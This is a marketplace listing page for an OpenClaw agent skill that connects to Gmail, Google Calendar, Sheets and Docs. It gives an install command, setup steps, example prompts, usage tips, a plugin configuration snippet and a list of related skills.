google-workspace
Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.
Why use this skill?
Integrate Gmail, Calendar, Sheets, and Docs into OpenClaw. Automate your workspace tasks with this powerful agent skill for seamless data management and communication.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/google-workspace-devfwWhat This Skill Does
The google-workspace skill provides a comprehensive bridge between your local OpenClaw agent and the Google Workspace ecosystem. By leveraging the official Google APIs, it empowers your AI agent to act as a personal assistant, capable of reading and drafting emails, managing your busy calendar, querying and updating complex spreadsheets, and generating documents within Google Docs. It handles the heavy lifting of authentication and session management via the required openclaw-agent, allowing for secure, authenticated interaction with your personal data.
Installation
To integrate this skill into your OpenClaw environment, execute the following command: clawhub install openclaw/skills/skills/hightower6eu/google-workspace-devfw. Before running, ensure you have the openclaw-agent utility installed (as detailed in the prerequisites). You must then create a project in the Google Cloud Console, enable the necessary APIs (Gmail, Calendar, Drive, etc.), and place your credentials.json file in your working directory. Finally, initialize the authentication flow as described in the setup documentation to link your Google account.
Use Cases
This skill is ideal for automating repetitive administrative tasks. You can use it to summarize your daily email inbox, automatically schedule meetings based on content found in emails, update project trackers in Google Sheets without manual data entry, or draft standardized reports directly into Google Docs. It is perfect for users who want to reduce the 'context switching' between communication platforms and data management tools.
Example Prompts
- "Check my Gmail and summarize the three most recent unread emails from my manager."
- "Add a meeting to my Google Calendar for tomorrow at 2 PM titled 'Project Sync' with the description 'Review quarterly goals'."
- "Search my spreadsheet titled 'Sales Tracker' and give me the sum of all values in the 'Revenue' column."
Tips & Limitations
Always ensure your token.pickle file is stored securely as it contains your authorization credentials. Be mindful of Google's API rate limits if you are processing large volumes of data. If the connection fails, verify that the openclaw-agent background process is active and that your OAuth credentials have not expired. For complex spreadsheet operations, ensure the sheet is formatted consistently to allow the agent to parse cells correctly.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-google-workspace-devfw": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.